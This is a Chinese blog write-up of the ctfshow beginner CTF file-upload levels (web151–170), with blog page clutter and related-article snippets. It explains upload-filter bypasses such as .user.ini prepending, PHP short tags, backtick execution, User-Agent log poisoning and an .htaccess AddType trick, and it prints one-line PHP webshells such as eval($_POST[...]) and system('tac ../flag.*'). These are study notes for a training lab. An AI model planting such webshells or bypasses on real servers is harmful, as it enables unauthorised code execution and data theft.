ctfshow-web入门-文件上传

已于 2024-05-10 15:23:51 修改
阅读量243 收藏
点赞数 3
分类专栏: ctfshow题解 文章标签: web安全
于 2024-05-06 23:21:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yingu9267/article/details/138511065
版权
本文介绍了Web入门阶段关于文件上传的安全挑战,包括前端与后端校验的不足,如何利用.user.ini、PHP后门、MIME验证、文件类型检查、日志注入等技巧绕过限制,以及常见的漏洞如远程文件包含和代码变异。
摘要由CSDN通过智能技术生成

ctfshow-web入门-文件上传

web入门–151

前端校验不可靠:前端代码可由用户随意更改,校验方式也能更改
在这里插入图片描述
更改校验内容为php,上传x.php,并用蚁剑连接,在目录中找到flag.php
在这里插入图片描述

web入门–152

前端校验:同less-151
后端校验:MIME验证

MIME:文件类型检测
通用结构:type/subtype

仅MIME作为后端校验不够严密
在这里插入图片描述

web入门–153

先上传.user.ini配置文件,通过.user.ini使得upload文件夹下每个php文件在文件头都包含1.png文件
在这里插入图片描述
上传包含恶意代码的1.png(png图片里有php后门代码,但是图片格式不能被触发,所以连接不上后门,要通过.user.ini才能以php形式运行)
在这里插入图片描述
蚁剑连接/upload/index.php即可

web入门–154 & 155

上传.user.ini成功
上传包含木马的1.png失败,说明本关加入了内容检测(经过尝试后发现对"<?php"进行了过滤,考虑使用php短标记来绕过) ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/10bd861a5cce4cb2bce140ea169cb03c.png) 代码改为:<?=eval($_POST['chopper']);?> 即可

web入门–156

过滤了“[]”,使用 <?=eval($_POST{'chopper'});?> 即可

web入门–157 & 158

过滤严重(甚至包含";")
使用 <?=system('tac ../flag.*')?> 作为1.png传输

在这里插入图片描述

访问url/upload即可(upload自动调用index.php,index.php又自动调用1.png中的system代码(.user.ini设置的结果))

web入门–159

使用反引号运算符的效果与shell_exec()相同

使用 <?=`tac ../f*`?> 作为1.png传输,访问url/upload即可

web入门–160

日志记录UA头,UA头写后门代码,就把后门植入到日志中,再文件包含日志即可EXP

1.上传.user.ini
2.上传1.png:<?=include"/var/lo"."g/nginx/access.lo"."g"?>(nginx的日志文件默认路径,已经进行了对“log”过滤的绕过)
3.在UA头中植入后门
在这里插入图片描述
访问/upload则可以找到flag(日志文件中)

web入门–161

验证文件头(png的文件头是GIF89a)

如图,要添加GIF89a才能上传成功
在这里插入图片描述
其余流程同less-160

web入门–162 & 163

远程文件包含

web入门–164 & 165

二次文件渲染

web入门–166

(压缩包文件漏洞(类似文件下载漏洞))
上传zip文件
在这里插入图片描述
访问后门执行恶意代码

在这里插入图片描述

web入门–167

上传含后门的jpg文件
在这里插入图片描述

在这里插入图片描述
.htacess
AddType application/x-httpd-php .jpg
(.jpg为后缀的任意文件将以application/x-httpd-php形式被解析)

web入门–168

简单的代码变异(免杀)
在这里插入图片描述

web入门–169 & 170

访问日志文件
在这里插入图片描述
让日志记录后门并利用
在这里插入图片描述

yingu9527
关注
专栏目录
CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web
2401_84297944的博客
04-28 993
F12。
2024年CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web(1)
2401_84252743的博客
05-01 295
版本控制很重要,但不要部署到生产环境更重要。 扫到文件信息泄露了 上面刚说完这就考到了 可以可以 访问即可。版本控制很重要,但不要部署到生产环境更重要。怎么又是这个提示 不会又是 泄露吧 在 扫一下看看 🆗这回是svn信息泄露!是的缩写,是一个开放源代码的版本控制系统使用后,项目目录下会生成隐藏的文件夹 里面包含备份文件 和这个也是一样的。 发现网页有个错别字?赶紧在生产环境改下,不好,死机了上一题刚说这一题提示就来了 就是 直接访问 即可。 只是一块饼干,不能存放任何隐私数据去网络里面找值 编码解码即
ctfshow文件上传web151
m0_62584974的博客
04-05 1158
2022/4/5 先写一个一句话木马文件 <?php eval($_POST[1]); ?> 试着上传php木马文件 上传失败 查看源码发现只能上传png文件 把它改成php 上传我们刚刚写的木马文件 访问我们刚刚上传的文件 利用Hackbar用post的方式提交 1=system("ls /"); 没有发现flag的文件 查看上一层的目录用post的形式提交 1=system("ls ../"); 发现...
ctfshow-web151,web152(文件上传)
m0_62094846的博客
01-17 2169
web151 这题如果关闭js文件就无法上传,无法通过绕过前台校验的方式进行 就上传png文件抓包后改成php web152 上传png文件抓包后改成php
CTFshow 文件上传 web152
Kradress的博客
02-13 546
目录思路题解总结 思路 提示:后端校验要严密 先上传一个png,然后抓包改成php,发现直接成功了 题解 访问文件直接RCE 总结 水题
ctfshow-web入门-文件上传web151-web160)
Welcome To Myon'Blog !
07-07 1519
试了下前端只能传 png 后缀的将一句话木马改成 png 后缀,上传后用 burpsuite 抓包绕过前端检测后,改回 php 后缀,发包拿到 flag:ctfshow{e3bd0332-4d5f-4255-941f-a2e6095c4f17}我们还可以直接改它前端验证的代码:原本只支持上传 png 后缀的文件我们加一个 php 后缀进去,即可直接上传 php 后缀的文件。
ctfshow WEB入门 文件上传151-170
byname1的博客
01-07 1642
只是过滤了分号,其他同上。php的最后一个分号可以省略。
ctfshow-web入门-信息搜集(web11-20)
HkD01L的博客
06-17 556
ctfshow,信息搜集,web11,web12,web13,web14,web15,web16,web17,web18,web19,web20,writeup,ctf
CTFShow-web入门-学习笔记-信息收集
最新发布
m0_66713779的博客
10-04 131
当用vi编辑文件时,vi会生成一个交换文件,如果这个文件可以被访问到,那么就可以依据这个文件恢复出被编辑文件的内容,会出现如下文件:index.php.swp、index.php.swo、index.php.swn。这回无论是查看源代码,还是抓包,还是dirsearch,都挖不出个鬼来,那就想办法挖出该网站的phps源文件。.phps是PHP的源代码文件,查看index.phps,成功下载网站的源代码。这题有点奇怪,源代码,抓包,目录扫描什么都没有,想到是备份文件泄漏。
CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web(1)
2401_84297899的博客
04-28 804
robots。
CTFshow之文件上传web入门151关-161关解密。包教包会!!!!
2301_77578012的博客
05-23 1356
当网站进行扫描时,会将.user.ini文件指向路径内容包含在首页代码处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置。发送一句话木马,修改content-type值为:image/png,此处注意一下,我直接上传.php文件发现无法通过,定睛一看才发现前端验证还没关,汗颜!上传1.png的木马。2.上传.user.ini文件(使用bp中repaeater重发器功能进行上传)
ctfshow web入门(文件上传)
Blazing-Angel的博客
07-19 2389
ctfshow 文件上传
ctfshow -web文件上传
m0_72898152的博客
02-02 972
ctf
CTFshow 文件上传 web159
Kradress的博客
02-15 473
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 成功上传.user.ini auto_prepend_file=shell.png 相比之前题目的过滤发现()也不能用了,不过可以用取反和异或来绕过 不需要括号的函数 echo require include Y1ng师傅的取反脚本,用data协议来执行代码 <?php $a = "data://text/plain,<?php system('tac ../f*');?>"; echo "~
CTFShow web151-170 (文件上传)
lonmar的博客
12-02 5718
web151 前端检测类型,burp抓包修改文件名称即可 文件上传思路,先上传一张图片马,再慢慢测试过滤规则(文件名,之类的) web152 思路和前面的一致 web153 上传.user.ini配置文件 原理:https://www.dazhuanlan.com/2020/03/08/5e641cbc397c2/ 防挂 https://www.cnblogs.com/l0nmar/p/14053889.html 发现很容易上传如php5,phtml等类型文件,但是不解析.通过插件识别为ngin
Web】CTFSHOW 文件上传刷题记录(全)
uuzeray的博客
01-16 1764
期末考完终于可以好好学ctf了,先把这些该回顾的回顾完,直接rushjava!
ctfshow web入门 文件上传前篇(web151-web160)
ccfly1012的博客
09-17 1140
目录 web151-web152 web153 web154 web155 web156 web157-web159 web160 web161 web151-web152 首先写一个一句哈: <?php @eval($_POST["1"]);?> 然后修改文件后缀为png(题目限制),上传文件同时进行抓包,然后修改后缀php,然后蚁剑连接,找到flag 拿到flag~~~~ web153 使用.user.ini绕过 .user.ini 摘抄...
CTFshow-web入门-文件上传
weixin_44770698的博客
07-06 1261
CTFshow-文件上传
ctfshow 文件上传 web151~170
shinygod的博客
03-22 1417
目录web151web 152web 153web 154web 155web 156 web151 上传提示,前端验证 上传.jpg文件然后抓包,改文件名为.php,加入一句话木马。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 152 同上,但对Content-Type进行了过滤。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 153 过滤了php,大小写改一
ctfshow-web入门爆破
08-30
在ctfshow-web入门爆破中,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码中的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回数据包,可以在爆破过程中去掉2.txt,只爆破目录即可。可以通过查看返回的数据包来获取目录中的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ctfshow web185 正则爆破脚本](https://download.csdn.net/download/eason612/86793758)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CTFshow web入门——爆破](https://blog.csdn.net/qq_49480008/article/details/112991503)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值